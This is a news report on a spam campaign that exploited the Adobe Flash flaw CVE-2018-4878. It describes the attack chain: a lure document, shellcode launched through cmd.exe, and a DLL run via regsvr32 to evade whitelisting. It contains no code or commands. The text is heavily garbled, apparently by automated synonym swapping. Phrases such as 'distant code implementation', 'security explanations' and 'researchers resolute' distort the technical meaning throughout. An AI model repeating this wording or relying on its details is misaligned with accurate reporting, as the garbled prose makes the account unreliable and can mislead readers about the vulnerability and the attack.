Endpoint security firm Morphisec has marked an enormous campaign that abuses a lately fixed Adobe Flash Player flaw to carry malware. The vulnerability in question, CVE-2018-4878, is a use-after-free flaw that Adobe fixed on February 6, subsequent reports that North Korean cybercriminals had been abusing the flaw in attacks purpose at South Korea.
The threat group, pursued as APT37, Reaper, Group123 and ScarCruft, has been escalating the scope and complexity of its campaigns. After Adobe fixed the security hole, which permits distant code implementation, other harmful actors began searching into means to exploit CVE-2018-4878.
Morphisec stated it marked a campaign last week on February 22, which had been consuming a version of the activity comparable to the one made by APT37. But, researchers figured out that the activity in the malspam campaign, dissimilar the one employed in the original threats, did not consume a 64-bit version.
The threat begins with a spam email including a specific link to a document kept on safe-storage[.]biz. The document notifies users that an online preview is not accessible and inculcates them to allow editing mode so as to view the content once downloaded and opened. If users fulfil, the Flash flaw is abused and the Windows command prompt is implemented. The related cmd.exe file is then added with harmful shellcode that joins to the cybercriminal’s domain.
The shellcode download and execute a DLL file using the Microsoft Register Server (regsvr32) utility. The genuine tool is exploited in an attempt to avoid whitelisting products. The harmful documents and the Flash abuse were only sensed by a few security explanations based on their signature at the time of Morphisec’s analysis.
Subsequently, the URLs contained in the spam emails were generated using Google’s URL shortening service, researchers resolute that each of the several links carried in this campaign had been get on tens and even hundreds of times within three to four days of being generated. Users clicked on the links from different browsers and email services, containing Outlook, Gmail and Aruba.it.
“As expected and predicted, adversaries have quickly adopted the Flash exploit, which is easily reproducible,” Morphisec’s Michael Gorelik explained in a blog post. “With small variations to the attack, they successfully launched a massive malspam campaign and bypassed most of the existing static scanning solutions once again.”